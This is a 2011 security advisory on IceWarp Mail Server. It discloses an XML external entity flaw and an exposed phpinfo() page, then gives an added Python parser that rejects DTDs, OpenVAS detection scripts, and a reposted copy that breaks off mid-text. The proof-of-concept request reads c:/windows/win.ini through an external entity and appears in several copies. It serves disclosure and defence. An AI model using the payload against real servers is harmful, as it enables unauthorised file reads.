Trustwave's SpiderLabs Security Advisory TWSL2011-013:
Multiple Vulnerabilities in IceWarp Mail Server
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt
Published: 2011-09-23
Version: 1.0
Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 10.3.2 and below
Product description: IceWarp WebMail is the web front-end for the IceWarp
Mail Server, which provides email access on over 50,000 servers. IceWarp
WebMail provides web-based access to email, calendars, contacts, files
and shared data from any computer with a browser and Internet connection.
Credit: David Kirkpatrick of Trustwave's SpiderLabs
Finding 1: XML External Entity Injection
CVE: CVE-2011-3579
An external entity is a feature of the XML specification that allows XML
documents to reference resources external to the XML document. When the
application's XML parser processes such a reference, it is forced to access
the resource specified.
In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to
access local files on the operating system where the IceWarp server is
installed. Using this technique it is possible to retrieve readable files
on the operating system. This attack can also be used to create a possible
denial of service condition.
Proof-of-Concept:
The following POST request was sent to the host A.B.C.D where the IceWarp
mail server was running:
REQUEST
=========
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache
<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
type="set"><query
xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c
6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc
d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
/query></iq>
RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113
<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
uid="login_invalid">test; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...TRUNCATED
The above proof-of-concept would retrieve the c:\windows\win.ini file (the
response in this example has been truncated).
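
The server-side counterpart to Finding 1, as an added example that is not part of the advisory or of IceWarp's code: a Python parser for the login body shown above that refuses any DOCTYPE before an entity can be resolved, which covers both the file read and the denial-of-service case. The function names, the RejectedBody exception and the sample bodies are assumptions constructed for illustration; only the element names and the webmail:iq:auth namespace come from the request on the page.

```python
from xml.parsers import expat

AUTH_NS = "webmail:iq:auth"                # namespace used by the request on the page
WANTED = {"username", "digest", "method"}  # children of <query> in that request


class RejectedBody(ValueError):
    """The request body is malformed or carries a DTD (hypothetical name)."""


def parse_auth_iq(body: bytes) -> dict:
    """Return the login fields, refusing any DOCTYPE before entities resolve."""
    parser = expat.ParserCreate(namespace_separator=" ")
    fields, chunks = {}, []
    current = [None]  # local name of the wanted element being read, if any

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at "<!DOCTYPE", before any <!ENTITY ...> inside it is processed.
        raise RejectedBody(f"DOCTYPE not allowed (declared root {name!r})")

    def start(name, attrs):
        # With namespace_separator set, names arrive as "<namespace> <local>".
        ns, _, local = name.rpartition(" ")
        current[0] = local if ns == AUTH_NS and local in WANTED else None
        chunks.clear()

    def chars(data):
        if current[0]:
            chunks.append(data)

    def end(name):
        if current[0]:
            fields[current[0]] = "".join(chunks)
        current[0] = None

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        # Includes references to undeclared entities, which are not well-formed.
        raise RejectedBody(f"malformed XML: {exc}") from exc
    missing = WANTED - fields.keys()
    if missing:
        raise RejectedBody(f"missing fields: {sorted(missing)}")
    return fields


def is_rejected(body: bytes) -> bool:
    """True when parse_auth_iq refuses the body."""
    try:
        parse_auth_iq(body)
    except RejectedBody:
        return True
    return False


# Constructed sample bodies; the digest value is a placeholder.
QUERY = (b'<iq type="set"><query xmlns="webmail:iq:auth">'
         b'<username>%s</username><digest>00ff</digest>'
         b'<method>RSA</method></query></iq>')
BENIGN = QUERY % b"test"
# Same shape as the request in the advisory: external SYSTEM entity.
EXTERNAL_ENTITY = (b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM '
                   b'"file:///c:/windows/win.ini"> ]>' + QUERY % b"test&xxe;")
# Internal entities only: the entity-expansion (denial of service) shape.
INTERNAL_ENTITY = (b'<!DOCTYPE foo [<!ENTITY a "aaaa">'
                   b'<!ENTITY b "&a;&a;&a;&a;">]>' + QUERY % b"&b;")

if __name__ == "__main__":
    for label, body in [("benign", BENIGN),
                        ("external entity", EXTERNAL_ENTITY),
                        ("internal entity", INTERNAL_ENTITY)]:
        try:
            print(f"{label}: accepted {parse_auth_iq(body)}")
        except RejectedBody as exc:
            print(f"{label}: rejected ({exc})")
```

Rejecting at the DOCTYPE rather than at the entity reference means the decision does not depend on how the underlying parser is configured to resolve entities.
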
Finding 2: PHP Information Disclosure
CVE: CVE-2011-3580
It is possible to retrieve the PHP information page generated by phpinfo()
by accessing the URL http://A.B.C.D/server, where A.B.C.D is the IP of the
server running the IceWarp software. The response will be a page detailing
the PHP version used and the configuration settings of PHP, including
system details.
Vendor Response: These issues have been addressed as of version 10.3.3
Remediation Steps: Customers should update to the latest version of IceWarp
Mail Server in order to address these issues. The above issues have been
corrected in version 10.3.3.
Revision History:
08/03/11 - Vulnerability disclosed
09/19/11 - Patch released
09/23/11 - Advisory published
About Trustwave: Trustwave is the leading provider of on-demand and
subscription-based information security and payment card industry
compliance management solutions to businesses and government entities
throughout the world. For organizations faced with today's challenging
data security and compliance environment, Trustwave provides a unique
approach with comprehensive solutions that include its flagship
TrustKeeper compliance management software and other proprietary security
solutions. Trustwave has helped thousands of organizations--ranging from
Fortune 500 businesses and large financial institutions to small and
medium-sized retailers--manage compliance and secure their network
infrastructure, data communications and critical information assets.
Trustwave is headquartered in Chicago with offices throughout North
America, South America, Europe, Africa, China and Australia. For more
information, visit https://www.trustwave.com
About Trustwave's SpiderLabs: SpiderLabs is the advanced security team at
Trustwave responsible for incident response and forensics, ethical hacking
and application security tests for Trustwave's clients. SpiderLabs has
responded to hundreds of security incidents, performed thousands of ethical
hacking exercises and tested the security of hundreds of business
applications for Fortune 500 organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is"
without warranty of any kind. Trustwave disclaims all warranties, either
express or implied, including the warranties of merchantability and fitness
for a particular purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
{"id": "SECURITYVULNS:DOC:27071", "bulletinFamily": "software", "title": "TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server", "description": "Trustwave's SpiderLabs Security Advisory TWSL2011-013:\r\nMultiple Vulnerabilities in IceWarp Mail Server\r\n\r\nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\r\n\r\nPublished: 2011-09-23\r\nVersion: 1.0\r\n\r\nVendor: IceWarp (http://www.icewarp.com)\r\nProduct: IceWarp Mail Server\r\nVersion affected: 10.3.2 and below\r\n\r\nProduct description: IceWarp WebMail is the web front-end for the IceWarp\r\nMail Server, which provides email access on over 50,000 servers. IceWarp\r\nWebMail provides web-based access to email, calendars, contacts, files\r\nand shared data from any computer with a browser and Internet connection.\r\n\r\nCredit: David Kirkpatrick of Trustwave's SpiderLabs\r\n\r\nFinding 1: XML External Entity Injection\r\nCVE: CVE-2011-3579\r\n\r\nAn external entity is a function of the XML specification which allows XML\r\ndocuments to reference resources external to the XML document. This\r\nfunctionality forces the XML parser of the application to access the\r\nresource specified.\r\n\r\nIn this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to\r\naccess local files on the operating system where the IceWarp server is\r\ninstalled. Using this technique it is possible to retrieve readable files\r\non the operating system. 
This attack can also be used to create a possible\r\ndenial of service condition.\r\n\r\nProof-of-Concept:\r\n\r\nThe following POST request was sent to the host A.B.C.D where the IceWarp\r\nmail server was running:\r\n\r\nREQUEST\r\n=========\r\nPOST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1\r\nHost:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)\r\nGecko/20100101 Firefox/5.0\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language:en-gb,en;q=0.5i've\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nProxy-Connection: keep-alive\r\nReferer: http://A.B.C.D\r\nContent-Length: 249\r\nContent-Type: application/xml;charset=UTF-8\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq\r\ntype="set"><query\r\nxmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c\r\n6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc\r\nd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><\r\n/query></iq>\r\n\r\nRESPONSE:\r\n==========\r\nHTTP/1.1 200 OK\r\nServer: IceWarp/9.4.2\r\nDate: Wed, 20 Jul 2011 10:04:56 GMT\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control:no-store, no-cache, must-revalidate, post-check=0,\r\npre-check=0 Pragma: no-cache\r\nContent-Type: text/xml\r\nVary: Accept-Encoding\r\nContent-Length: 1113\r\n\r\n<?xml version="1.0" encoding="utf-8"?><iq type="error"><error\r\nuid="login_invalid">test; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1\r\n...TRUNCATED\r\n\r\nThe above proof-of-concept would retrieve the c:\windows\win.ini file (the\r\nresponse in this example has been truncated).\r\n\r\n\r\nFinding 2: PHP Information Disclosure\r\nCVE: CVE-2011-3580\r\n\r\nIt is possible to retrieve the PHP information file phpinfo() by accessing\r\nthe following URL 
http://A.B.C.D/server where A.B.C.D is the IP of the\r\nserver running the IceWarp software. The response will be a page detailing\r\nthe PHP version used and the configuration settings of PHP, including\r\nsystem details.\r\n\r\n\r\nVendor Response: These issues have been addressed as of version 10.3.3\r\n\r\nRemediation Steps: Customers should update to the latest version of IceWarp\r\nMail Server in order to address these issues. The above issues have been\r\ncorrected in version 10.3.3.\r\n\r\nRevision History:\r\n08/03/11 - Vulnerability disclosed\r\n09/19/11 - Patch released\r\n09/23/11 - Advisory published\r\n\r\n\r\nAbout Trustwave: Trustwave is the leading provider of on-demand and\r\nsubscription-based information security and payment card industry\r\ncompliance management solutions to businesses and government entities\r\nthroughout the world. For organizations faced with today's challenging\r\ndata security and compliance environment, Trustwave provides a unique\r\napproach with comprehensive solutions that include its flagship\r\nTrustKeeper compliance management software and other proprietary security\r\nsolutions. Trustwave has helped thousands of organizations--ranging from\r\nFortune 500 businesses and large financial institutions to small and\r\nmedium-sized retailers--manage compliance and secure their network\r\ninfrastructure, data communications and critical information assets.\r\nTrustwave is headquartered in Chicago with offices throughout North\r\nAmerica, South America, Europe, Africa, China and Australia. For more\r\ninformation, visit https://www.trustwave.com\r\n\r\nAbout Trustwave's SpiderLabs: SpiderLabs is the advance security team at\r\nTrustwave responsible for incident response and forensics, ethical hacking\r\nand application security tests for Trustwave's clients. 
SpiderLabs has\r\nresponded to hundreds of security incidents, performed thousands of ethical\r\nhacking exercises and tested the security of hundreds of business\r\napplications for Fortune 500 organizations. For more information visit\r\nhttps://www.trustwave.com/spiderlabs\r\n\r\nDisclaimer: The information provided in this advisory is provided "as is"\r\nwithout warranty of any kind. Trustwave disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness\r\nfor a particular purpose. In no event shall Trustwave or its suppliers be\r\nliable for any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages, even if\r\nTrustwave or its suppliers have been advised of the possibility of such\r\ndamages. Some states do not allow the exclusion or limitation of liability\r\nfor consequential or incidental damages so the foregoing limitation may not\r\napply.\r\n\r\n\r\n\r\n\r\n\r\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. 
If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.\r\n", "published": "2011-09-26T00:00:00", "modified": "2011-09-26T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27071", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 30, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "openvas", "idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}]}, "exploitation": null, "vulnersScore": 0.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659730939}}
{"openvas": [{"lastseen": "2019-05-29T18:39:28", "description": "The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n - Certain input passed via SOAP messages to ", "cvss3": {}, "published": "2011-09-27T00:00:00", "type": "openvas", "title": "IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "modified": "2018-10-20T00:00:00", "id": "OPENVAS:1361412562310902478", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:icewarp:mail_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902478\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)\");\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_bugtraq_id(49753);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46135/\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70026\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70025\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_icewarp_web_detect.nasl\");\n script_mandatory_keys(\"icewarp/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to gain access to potentially\nsensitive information, and possibly cause denial-of-service conditions. 
Other attacks may also be possible.\");\n\n script_tag(name:\"affected\", value:\"IceWarp Mail Server 10.3.2 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to IceWarp Mail Server 10.3.3 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n - Certain input passed via SOAP messages to 'server/webmail.php' is not properly verified before being used. This\ncan be exploited to disclose the contents of arbitrary files.\n\n - An unspecified script, which calls the 'phpinfo()' function, is stored with insecure permissions inside the web\nroot. This can be exploited to gain knowledge of sensitive information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.icewarp.com\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!icewarp = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif (version_is_less(version: icewarp, test_version: \"10.3.3\")) {\n report = report_fixed_ver(installed_version: icewarp, fixed_version: \"10.3.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2017-07-27T10:55:29", "description": "IceWarp Web Mail is prone to multiple information-disclosure\nvulnerabilities.\n\nAttackers can exploit these issues to gain access to potentially\nsensitive information, and possibly cause denial-of-service\nconditions; other attacks may also be possible.", "cvss3": {}, "published": "2011-09-28T00:00:00", "type": "openvas", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "modified": "2017-07-12T00:00:00", 
"id": "OPENVAS:103279", "href": "http://plugins.openvas.org/nasl.php?oid=103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_IceWarp_49753.nasl 6696 2017-07-12 11:30:15Z cfischer $\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"IceWarp Web Mail is prone to multiple information-disclosure\nvulnerabilities.\n\nAttackers can exploit these issues to gain access to potentially\nsensitive information, and possibly cause denial-of-service\nconditions; other attacks may also be possible.\";\n\ntag_solution = \"Vendor updates are available. 
Please see the references for more\ninformation.\";\n\nif (description)\n{\n script_id(103279);\n script_version(\"$Revision: 6696 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 13:30:15 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\",\"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/49753\");\n script_xref(name : \"URL\" , value : \"http://www.icewarp.com/Products/IceWarp_Web_Mail/\");\n script_xref(name : \"URL\" , value : \"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\nbanner = get_http_banner(port:port);\nif(!banner || \"IceWarp\" >!< banner)exit(0);\n\nforeach dir( make_list_unique( \"/webmail\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/server/\"); \n\n if(http_vuln_check(port:port, url:url,pattern:\"<title>phpinfo\\(\\)\")) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report 
);\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-05-08T19:10:45", "description": "IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.", "cvss3": {}, "published": "2011-09-28T00:00:00", "type": "openvas", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310103279", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103279\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49753\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"summary\", value:\"IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. 
Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || \"IceWarp\" >!< banner ) exit( 0 );\n\nforeach dir( make_list_unique( \"/webmail\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/server/\";\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\\(\\)\", usecache:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:52", "description": "", "cvss3": {}, "published": "2011-09-23T00:00:00", "type": "packetstorm", "title": "IceWarp Mail Server Injection / Information Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "modified": "2011-09-23T00:00:00", "id": "PACKETSTORM:105320", "href": "https://packetstormsecurity.com/files/105320/IceWarp-Mail-Server-Injection-Information-Disclosure.html", "sourceData": "`Trustwave's SpiderLabs Security Advisory TWSL2011-013: \nMultiple Vulnerabilities in IceWarp Mail Server \n \nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt \n \nPublished: 2011-09-23 \nVersion: 1.0 \n \nVendor: IceWarp (http://www.icewarp.com) \nProduct: IceWarp Mail Server \nVersion affected: 10.3.2 and below \n \nProduct description: IceWarp WebMail is the web front-end for the IceWarp \nMail Server, which provides email access on over 50,000 servers. 
IceWarp \nWebMail provides web-based access to email, calendars, contacts, files \nand shared data from any computer with a browser and Internet connection. \n \nCredit: David Kirkpatrick of Trustwave's SpiderLabs \n \nFinding 1: XML External Entity Injection \nCVE: CVE-2011-3579 \n \nAn external entity is a function of the XML specification which allows XML \ndocuments to reference resources external to the XML document. This \nfunctionality forces the XML parser of the application to access the \nresource specified. \n \nIn this case it is possible to inject an XML DOCTYPE \"SYSTEM\" directive to \naccess local files on the operating system where the IceWarp server is \ninstalled. Using this technique it is possible to retrieve readable files \non the operating system. This attack can also be used to create a possible \ndenial of service condition. \n \nProof-of-Concept: \n \nThe following POST request was sent to the host A.B.C.D where the IceWarp \nmail server was running: \n \nREQUEST \n========= \nPOST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1 \nHost:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) \nGecko/20100101 Firefox/5.0 \nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language:en-gb,en;q=0.5i've \nAccept-Encoding: gzip, deflate \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nProxy-Connection: keep-alive \nReferer: http://A.B.C.D \nContent-Length: 249 \nContent-Type: application/xml;charset=UTF-8 \nPragma: no-cache \nCache-Control: no-cache \n \n<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM \"file:///c:/windows/win.ini\"> ]><iq \ntype=\"set\"><query \nxmlns=\"webmail:iq:auth\"><username>test&xxeb91c4;</username><digest>828cd27c \n6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc \nd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method>< \n/query></iq> \n \nRESPONSE: \n========== \nHTTP/1.1 200 OK \nServer: IceWarp/9.4.2 \nDate: Wed, 20 Jul 2011 10:04:56 
